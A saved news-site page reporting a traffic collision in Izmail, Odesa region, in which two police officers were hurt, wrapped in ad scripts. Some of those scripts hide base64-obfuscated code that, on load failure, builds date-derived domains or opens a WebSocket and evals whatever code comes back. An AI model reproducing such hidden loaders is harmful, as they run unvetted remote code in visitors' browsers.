<!DOCTYPE html>
<html>
  
  <head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>На Одесчине два полицейских пострадали в ДТП</title>
<meta name="description" content="Столкнулись Renault Duster и Mazda." />
<meta name="keywords" content="" />
<meta name="generator" content="DataLife Engine (http://dle-news.ru)" />
<meta property="og:site_name" content="Хроника мировых событий" />
<meta property="og:type" content="article" />
<meta property="og:title" content="На Одесчине два полицейских пострадали в ДТП" />
<meta property="og:url" content="http://hronika.info/kriminal/401466-na-odeschine-dva-policeyskih-postradali-v-dtp.html" />
<meta property="og:image" content="http://hronika.info/uploads/posts/2019-02/thumbs/1551013857_izmail.jpg" />
<link rel="search" type="application/opensearchdescription+xml" href="http://hronika.info/engine/opensearch.php" title="Хроника мировых событий" />
<link rel="alternate" type="application/rss+xml" title="Хроника мировых событий" href="http://hronika.info/rss.xml" />
<script type="text/javascript" src="/engine/classes/js/jquery.js"></script>
<script type="text/javascript" src="/engine/classes/js/jqueryui.js"></script>
<script type="text/javascript" src="/engine/classes/js/dle_js.js"></script>
<script type="text/javascript" src="/engine/classes/js/bbcodes.js"></script>
<script type="text/javascript" src="/engine/classes/highslide/highslide.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js"></script>
<script type="text/javascript" src="/engine/editor/scripts/webfont.js"></script>
<link media="screen" href="/engine/editor/css/default.css" type="text/css" rel="stylesheet" />
    <link rel="icon" type="image/png" href="/favicon.png" />
    <link rel="apple-touch-favicon" href="/apple-touch-favicon.png"/>
    <link media="screen" href="/templates/hronika/css/engine.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/orating.css" type="text/css" rel="stylesheet" />
    <link media="screen" href="/templates/hronika/css/css.css" type="text/css" rel="stylesheet" />
    
    <meta property="fb:admins" content="490214530991726"/>  
    <meta property="fb:app_id" content="574441425949200"/>  
    <meta name="4309768020df0301dc59380bc0812f0f" content="">
  </head>

  <body><script type="text/javascript">
<!--
var dle_root       = '/';
var dle_admin      = '';
var dle_login_hash = '';
var dle_group      = 5;
var dle_skin       = 'hronika';
var dle_wysiwyg    = '0';
var quick_wysiwyg  = '0';
var dle_act_lang   = ["Да", "Нет", "Ввод", "Отмена", "Сохранить", "Удалить", "Загрузка. Пожалуйста, подождите..."];
var menu_short     = 'Быстрое редактирование';
var menu_full      = 'Полное редактирование';
var menu_profile   = 'Просмотр профиля';
var menu_send      = 'Отправить сообщение';
var menu_uedit     = 'Админцентр';
var dle_info       = 'Информация';
var dle_confirm    = 'Подтверждение';
var dle_prompt     = 'Ввод информации';
var dle_req_field  = 'Заполните все необходимые поля';
var dle_del_agree  = 'Вы действительно хотите удалить? Данное действие невозможно будет отменить';
var dle_spam_agree = 'Вы действительно хотите отметить пользователя как спамера? Это приведёт к удалению всех его комментариев';
var dle_complaint  = 'Укажите текст Вашей жалобы для администрации:';
var dle_big_text   = 'Выделен слишком большой участок текста.';
var dle_orfo_title = 'Укажите комментарий для администрации к найденной ошибке на странице';
var dle_p_send     = 'Отправить';
var dle_p_send_ok  = 'Уведомление успешно отправлено';
var dle_save_ok    = 'Изменения успешно сохранены. Обновить страницу?';
var dle_del_news   = 'Удалить статью';
var allow_dle_delete_news   = false;
//-->
</script><script type="text/javascript">  
<!--  
	hs.graphicsDir = '/engine/classes/highslide/graphics/';
	hs.outlineType = 'rounded-white';
	hs.numberOfImagesToPreload = 0;
	hs.showCredits = false;
	
	hs.lang = {
		loadingText :     'Загрузка...',
		playTitle :       'Просмотр слайдшоу (пробел)',
		pauseTitle:       'Пауза',
		previousTitle :   'Предыдущее изображение',
		nextTitle :       'Следующее изображение',
		moveTitle :       'Переместить',
		closeTitle :      'Закрыть (Esc)',
		fullExpandTitle : 'Развернуть до полного размера',
		restoreTitle :    'Кликните для закрытия картинки, нажмите и удерживайте для перемещения',
		focusTitle :      'Сфокусировать',
		loadingTitle :    'Нажмите для отмены'
	};
	
	hs.align = 'center';
	hs.transitions = ['expand', 'crossfade'];
	hs.addSlideshow({
		interval: 4000,
		repeat: false,
		useControls: true,
		fixedControls: 'fit',
		overlayOptions: {
			opacity: .75,
			position: 'bottom center',
			hideOnMouseOut: true
		}
	});
//-->
</script>

    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
  (adsbygoogle = window.adsbygoogle || []).push({
    google_ad_client: "ca-pub-9393887096432784",
    enable_page_level_ads: true
  });
</script>
    
    <header id="header" class="bshadow">
      <div class="maxw"><div class="logowrap







kriminal













">
    <div class="logo"><img src="/templates/hronika/images/logo.png" alt="Хроника мировых событий" style="width: 100%;" /></div>
    
</div>	      <a href="/" class="index"></a>
			<nav class="top-menu bshadow">
				<ul>
					<li><a href="/politika/" >Политика</a></li>
					<li><a href="/ekonomika/" >Экономика</a></li>
                    <li><a href="/obwestvo/" >Общество</a></li>
                    <li><a href="/kultura/" >Культура</a></li>
					<li><a href="/sport/" >Спорт</a></li>
					<li><a href="/avto/" >Авто</a></li>
					<li><a href="/otdyh/" >Отдых</a></li>
					<li><a href="/medicina/" >Медицина</a></li>
                    <li><a href="/nedvizhimost/" >Недвижимость</a></li>
					<li><a href="/videonovosti/" >Видеоновости</a></li>						
				</ul>					
				<ul>
                    <li><a href="/ukraina/" >Украина</a></li>
					<li><a href="/mir/" >Мир</a></li>
					<li><a href="/rossija/" >Россия</a></li>
					<li><a href="/tehnologii/" >Технологии</a></li>
                    <li><a href="/neverojatnoe/" >Невероятное</a></li>
					<li><a href="/igry/" >Игры</a></li>                    					
				    <li class="tm-selected"><a href="/kriminal/" >Происшествия</a></li>
                    <li><a href="/fotoreportazhi/" >Фоторепортажи</a></li>
					<li><a href="/kurjozy/" >Курьезы</a></li>
					<li><a href="/mnenia/" >Мнения</a></li>
				</ul>
			</nav>
            <div class="reklright"></div>
      </div>
      </header>
      <div id="wrcont">

	  <!--noindex--><!--/noindex-->
       
        <div class="google-top-center"><!-- noindex -->
<center>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Под меню заглушка -->
<ins class="adsbygoogle"
     style="display:inline-block;width:970px;height:90px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5011853349"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</center>
<!--/noindex--></div>
        <section id="middle">
          <div class="clr"><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/" itemprop="url"><span itemprop="title">Хроника событий</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://hronika.info/kriminal/" itemprop="url"><span itemprop="title">Происшествия</span></a></span> &raquo; На Одесчине два полицейских пострадали в ДТП</span></div></div>
          <div id="container">
            <div id="content2">
 

              <article>

			   <div id='dle-content'>

<div class="full-story">
 <div class="mainc fullimg200_150">
  <div class="full-storyttl">
  <div class="fullinfo"></div>
   <div class="fullargcat"><b>Раздел:&nbsp;</b><strong><a href="http://hronika.info/kriminal/">Происшествия</a></strong>&nbsp;&nbsp;</div>
   <div class="orating ignore-select" id="orating-401466">
	<a href="#" class="orating_m" title="Не нравится" onclick="orating(401466,0);return false;"></a>
	<a href="#" class="orating_p" title="Нравится" onclick="orating(401466,1);return false;"></a>
	<a href="#" class="orating_res" onclick="ostats(401466,1,true);return false;">0</a>
</div>

  </div>
		<div class="ttl_h1full"><h1><span id="news-title">На Одесчине два полицейских пострадали в ДТП</span></h1></div>
     
<div class="ax-full _ga1_on_">
	<!--TBegin:http://hronika.info/uploads/posts/2019-02/1551013857_izmail.jpg|left--><a href="http://hronika.info/uploads/posts/2019-02/1551013857_izmail.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2019-02/thumbs/1551013857_izmail.jpg" style="float:left;" alt='На Одесчине два полицейских пострадали в ДТП' title='На Одесчине два полицейских пострадали в ДТП'  /></a><!--TEnd--><b>Столкнулись Renault Duster и Mazda.</b><br /><br />В городе Измаил Одесской области в субботу, 23 февраля, на пересечении проспекта Мира и улицы Ивана Франко не разминулись автомобиль патрульной полиции Renault Duster и легковое авто Mazda, передает <a href="http://hronika.info/">Хроника.инфо</a> со ссылкой на <a href="https://strana.ua/news/187814-v-izmaile-lehkovoe-avto-ne-propustilo-politsiju-i-proizoshlo-dtp.html" target="_blank">strana.ua</a>.<br /><br />Автомобиль Mazda двигаясь по проспекту Мира, начал совершать маневр левого поворота и не уступил дорогу автомобилю патрульной полиции (который также двигался по проспекту). В результате произошло ДТП.<br /><br /><b>Читайте также: <a href="http://hronika.info/kriminal/401457-na-harkovschine-shestiletniy-malchik-provalilsya-pod-led-i-utonul.html" >На Харьковщине шестилетний мальчик провалился под лед и утонул</a></b><br /><br />От удара авто патрульных отбросило за пределы проезжей части. В результате столкновения травмы получили два сотрудника полиции, которых госпитализировали в медучреждение.<br /><br /><div style="text-align:center;"><!--TBegin:http://hronika.info/uploads/posts/2019-02/1551013918_izmail2.jpg|--><a href="http://hronika.info/uploads/posts/2019-02/1551013918_izmail2.jpg" rel="highslide" class="highslide"><img src="/uploads/posts/2019-02/thumbs/1551013918_izmail2.jpg" alt='На Одесчине два полицейских пострадали в ДТП' title='На Одесчине два полицейских пострадали в ДТП'  /></a><!--TEnd--></div>
    <br><br>
      <div id="mp_wid_2032"></div>
            <script type="text/javascript"  src="https://info.kinoclub77.ru/rank/2032/fly-min.js"></script>
            <script>CreateOverplayWidget({pid:"2032",selector:"#mp_wid_2032",limit:0,muted:1,autoplay:1,fly:3});</script>
	<div class="ctrlE">Если вы нашли ошибку в тексте, выделите её мышью и нажмите Ctrl+Enter</div>
</div>
<div class="clr"><br /><p class="basetags">&nbsp;<i>Теги: <a href="http://hronika.info/tags/%D0%9E%D0%B4%D0%B5%D1%81%D1%81%D0%BA%D0%B0%D1%8F+%D0%BE%D0%B1%D0%BB%D0%B0%D1%81%D1%82%D1%8C/">Одесская область</a>, <a href="http://hronika.info/tags/%D0%94%D0%A2%D0%9F/">ДТП</a></i></p></div>
<div class="full-top_banner">
    <div id="gnezdo_ru_10323">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = 'https://news.2xclick.ru/show/10323/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
    </div>
<div class="full-top_banner">
    <div id="AD67HoqbIKGudtbW5O7h" data-type="0" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'hronikka.com';</script>
<script src="//hronikka.com/lT/v8.js" ></script>
    <div id="MIXADV_4787" class="MIXADVERT_NET"></div>
          <script> 
          var node4787 = document.getElementById("MIXADV_4787");
          if( node4787 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4787&r="+Math.random();
               node4787.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDQ3ODcgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNDc4Ny5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3ZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLmNvbSI7c2NyaXB0X3NlY29uZC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNDc4Ny5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9zZWNvbmQpOyBzZXRUaW1lb3V0KCBmdW5jdGlvbiAoKSB7IGlmKCBub2RlNDc4Ny5pbm5lckhUTUwgPT0gIiIgKSB3aW5kb3cuZXZhbChsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgiNDc4NyIpKSB9LCA1MDAwKTsgIDt9OyA=") );
              }
          }
          </script>
    <!-- Composite Start -->
<div id="M225926ScriptRootC608873">
        <div id="M225926PreloadC608873">
        Загрузка...    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M225926ScriptRootC608873")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M225926ScriptRootC608873");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=608873;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.marketgid.com/h/r/hronika.info.608873.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})();
    </script>
    <script>s1='${PUBLISHER_ID}'</script></div>
<!-- Composite End -->
    
    <!-- start NEW content_v1 for hronika.info -->
<div id="adpartner-jsunit-851">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=851&" + Math.random();
        head.appendChild(script);
    </script>
</div>

<!-- end NEW content_v1 for hronika.info -->
    
    <script id="r17724" type="text/javascript">
    (function() {
        var worker17724,
            tickerID = 17724,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17724.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker17724.postMessage(data);
                }

                worker17724 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17724.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17724.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
    <div id="bn_aa922818e6">загрузка...</div>
<script type="text/javascript" src="//recreativ.ru/rcode.aa922818e6.js"></script>
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({
          google_ad_client: "ca-pub-9393887096432784",
          enable_page_level_ads: true
     });
</script>
     </div>
<div class="f_bottm">
 <div class="f_date_author">Сегодня, 15:11 » Автор: <a onclick="ShowProfile('%D0%90%D0%BD%D0%BD%D0%B0+%D0%9C%D0%B0%D1%80%D1%82%D1%8B%D0%BD%D0%BE%D0%B2%D0%B0', 'http://hronika.info/user/%D0%90%D0%BD%D0%BD%D0%B0+%D0%9C%D0%B0%D1%80%D1%82%D1%8B%D0%BD%D0%BE%D0%B2%D0%B0/', '0'); return false;" href="http://hronika.info/user/%D0%90%D0%BD%D0%BD%D0%B0+%D0%9C%D0%B0%D1%80%D1%82%D1%8B%D0%BD%D0%BE%D0%B2%D0%B0/">Анна Мартынова</a></div> 
 <div class="view_comments">  
  <div class="f_views"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;87</div>
  <div class="f_comments"><span></span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0</div> 
  </div>
</div>
	</div>    
<div class="sb">
<div class="sotsseti">
<!-- noindex -->
  <script type="text/javascript">(function() {
      if (window.pluso) {return};
       var d = document, s = d.createElement('script'), g = 'getElementsByTagName';
       s.type = 'text/javascript'; s.charset='UTF-8'; s.async = true;
       s.src = ('https:' == window.location.protocol ? 'https' : 'http')  + '://x.pluso.ru/pluso-x.js';
       var h=d[g]('body')[0];
       h.appendChild(s);
    })();
 </script>
<div class="pluso-engine" pluso-sharer={"buttons":"facebook,twitter,google,vkontakte,moimir,email,print,more","style":{"size":"small","shape":"square","theme":"theme03","css":""},"orientation":"horizontal","multiline":false} ></div> 
<!-- /noindex -->
    
<div class="sotslikes">
<!-- Код рейтинга -->

</div>
</div>
 <div class="fullstoryn">
   <div class="bshadow exban"> 
    
    
    <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Рекомендуемый под новостью -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="6534414543"
     data-ad-format="autorelaxed"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
           <div class="clr"></div>
    </div>
 </div>
  <div class="clr"></div>
  <div class="fullstoryn">
   <div class="bshadow exban">
  
    
   <div class="clr"></div>
    </div>
 </div>  
</div><br/>
<!--ЗАКОММЕНТИРОВАННЫЕ
<div class="related-n"> 
<div class="relttl"><h2>Похожие новости по теме</h2></div>
         <div class="clr"></div>
[related-news]{related-news}[/related-news] 
<div style="clear: both"></div>
</div>
         <div class="clr"></div>
-->
<!--ЗАКОММЕНТИРОВАННЫЕ
<div style="clear: both"></div>
<div class="poslednie-n">
<div class="relttl"><h2>Поcледние новости раздела category}</h2></div>
<div class="bshadow">
<div class="poslednie_div49-5 fleft">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div class="poslednie_div49-5 fright">custom category="2" template="/inks/shabnews/poslednie_n_fullstory" from="0" limit="5"}</div>
<div style="clear: both"></div>
</div>
</div>-->
<!--ЗАКОММЕНТИРОВАННЫЕ
<div style="clear: both"></div>
<div class="sovetuemsmotret">
<div class="relttl"><h2>Также советуем посмотреть</h2></div>
      <div class="slwrap3 bshadow">
      <div id="slider3">
        <a class="buttons prev" href="#"></a>
        <div class="viewport">
          <ul class="overview"><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401454-v-seti-vysmeyali-boevye-plany-pensionerok-putina.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1551010874_putin.png" alt="В Сети высмеяли «боевые» планы пенсионерок Путина" class="l_n_im" title="В Сети высмеяли «боевые» планы пенсионерок Путина" />
</a>
<strong class="ttl" title="В Сети высмеяли «боевые» планы пенсионерок Путина"><a href="http://hronika.info/kurjozy/401454-v-seti-vysmeyali-boevye-plany-pensionerok-putina.html">В Сети высмеяли «боевые» планы пенсионерок Путина</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401434-loki-stal-geroem-novogo-mema.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1551006400_memy7.jpeg" alt="Локи стал героем нового мема" class="l_n_im" title="Локи стал героем нового мема" />
</a>
<strong class="ttl" title="Локи стал героем нового мема"><a href="http://hronika.info/kurjozy/401434-loki-stal-geroem-novogo-mema.html">Локи стал героем нового мема</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401412-set-v-vostorge-ot-pandy-kuvyrkayuscheysya-v-snegu.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1551002398_panda.jpg" alt="Сеть в восторге от панды, кувыркающейся в снегу" class="l_n_im" title="Сеть в восторге от панды, кувыркающейся в снегу" />
</a>
<strong class="ttl" title="Сеть в восторге от панды, кувыркающейся в снегу"><a href="http://hronika.info/kurjozy/401412-set-v-vostorge-ot-pandy-kuvyrkayuscheysya-v-snegu.html">Сеть в восторге от панды, кувыркающейся в снегу</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401394-utrenniy-pozitiv-desyatka-otlichnyh-anekdotov-na-voskresene.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550998522_yumor.jpg" alt="Утренний позитив: десятка отличных анекдотов на воскресенье" class="l_n_im" title="Утренний позитив: десятка отличных анекдотов на воскресенье" />
</a>
<strong class="ttl" title="Утренний позитив: десятка отличных анекдотов на воскресенье"><a href="http://hronika.info/kurjozy/401394-utrenniy-pozitiv-desyatka-otlichnyh-anekdotov-na-voskresene.html">Утренний позитив: десятка отличных анекдотов на воскресенье</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401375-set-poveselila-koala-umeyuschaya-rasslablyatsya.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550994312_koala.jpg" alt="Сеть повеселила коала, умеющая расслабляться" class="l_n_im" title="Сеть повеселила коала, умеющая расслабляться" />
</a>
<strong class="ttl" title="Сеть повеселила коала, умеющая расслабляться"><a href="http://hronika.info/kurjozy/401375-set-poveselila-koala-umeyuschaya-rasslablyatsya.html">Сеть повеселила коала, умеющая расслабляться</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401365-neozhidannyy-priem-tayskiy-bokser-na-ringe-poceloval-sopernika.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550992314_bokser.jpg" alt="Неожиданный прием: тайский боксер на ринге поцеловал соперника" class="l_n_im" title="Неожиданный прием: тайский боксер на ринге поцеловал соперника" />
</a>
<strong class="ttl" title="Неожиданный прием: тайский боксер на ринге поцеловал соперника"><a href="http://hronika.info/kurjozy/401365-neozhidannyy-priem-tayskiy-bokser-na-ringe-poceloval-sopernika.html">Неожиданный прием: тайский боксер на ринге поцеловал соперника</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/401362-sutki-v-zone-oos-pogib-odin-ukrainskiy-voennyy.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550991767_donbass.jpg" alt="Сутки в зоне ООС: погиб один украинский военный" class="l_n_im" title="Сутки в зоне ООС: погиб один украинский военный" />
</a>
<strong class="ttl" title="Сутки в зоне ООС: погиб один украинский военный"><a href="http://hronika.info/ukraina/401362-sutki-v-zone-oos-pogib-odin-ukrainskiy-voennyy.html">Сутки в зоне ООС: погиб один украинский военный</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401305-v-seti-vysmeyali-foto-odioznogo-propagandista-kremlya.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550951744_foto3.png" alt="В Сети высмеяли фото одиозного пропагандиста Кремля" class="l_n_im" title="В Сети высмеяли фото одиозного пропагандиста Кремля" />
</a>
<strong class="ttl" title="В Сети высмеяли фото одиозного пропагандиста Кремля"><a href="http://hronika.info/kurjozy/401305-v-seti-vysmeyali-foto-odioznogo-propagandista-kremlya.html">В Сети высмеяли фото одиозного пропагандиста Кремля</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401293-putin-snova-opozorilsya-privselyudno.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550946946_putin.jpg" alt="Путин снова опозорился привселюдно" class="l_n_im" title="Путин снова опозорился привселюдно" />
</a>
<strong class="ttl" title="Путин снова опозорился привселюдно"><a href="http://hronika.info/kurjozy/401293-putin-snova-opozorilsya-privselyudno.html">Путин снова опозорился привселюдно</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401273-milye-pitbuli-kotorye-ne-kazhutsya-takimi-uzh-strashnymi.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550937546_478673.jpg" alt="Милые питбули, которые не кажутся такими уж страшными" class="l_n_im" title="Милые питбули, которые не кажутся такими уж страшными" />
</a>
<strong class="ttl" title="Милые питбули, которые не кажутся такими уж страшными"><a href="http://hronika.info/kurjozy/401273-milye-pitbuli-kotorye-ne-kazhutsya-takimi-uzh-strashnymi.html">Милые питбули, которые не кажутся такими уж страшными</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/401267-na-nepodkontrolnom-donbasse-avtobus-podorvalsya-na-mine-est-pogibshie.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550936268_na-nepodkontrolnom-donbasse-avtobus-podorvalsya-na-mine-est-pogibshie1.jpg" alt="На неподконтрольном Донбассе автобус подорвался на мине: есть погибшие" class="l_n_im" title="На неподконтрольном Донбассе автобус подорвался на мине: есть погибшие" />
</a>
<strong class="ttl" title="На неподконтрольном Донбассе автобус подорвался на мине: есть погибшие"><a href="http://hronika.info/ukraina/401267-na-nepodkontrolnom-donbasse-avtobus-podorvalsya-na-mine-est-pogibshie.html">На неподконтрольном Донбассе автобус подорвался на мине: есть погибшие</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401250-socseti-nasmeshil-metod-borby-s-gololedom-v-odesse.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550933713_fotor_155092835783260.jpg" alt="Соцсети насмешил метод борьбы с гололедом в Одессе" class="l_n_im" title="Соцсети насмешил метод борьбы с гололедом в Одессе" />
</a>
<strong class="ttl" title="Соцсети насмешил метод борьбы с гололедом в Одессе"><a href="http://hronika.info/kurjozy/401250-socseti-nasmeshil-metod-borby-s-gololedom-v-odesse.html">Соцсети насмешил метод борьбы с гололедом в Одессе</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401228-kak-zhivotnye-raduyutsya-popolneniyu-v-semyah.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550929464_1-18.jpg" alt="Как животные радуются пополнению в семьях" class="l_n_im" title="Как животные радуются пополнению в семьях" />
</a>
<strong class="ttl" title="Как животные радуются пополнению в семьях"><a href="http://hronika.info/kurjozy/401228-kak-zhivotnye-raduyutsya-popolneniyu-v-semyah.html">Как животные радуются пополнению в семьях</a></strong>
</li><li class="listalkafull_n">
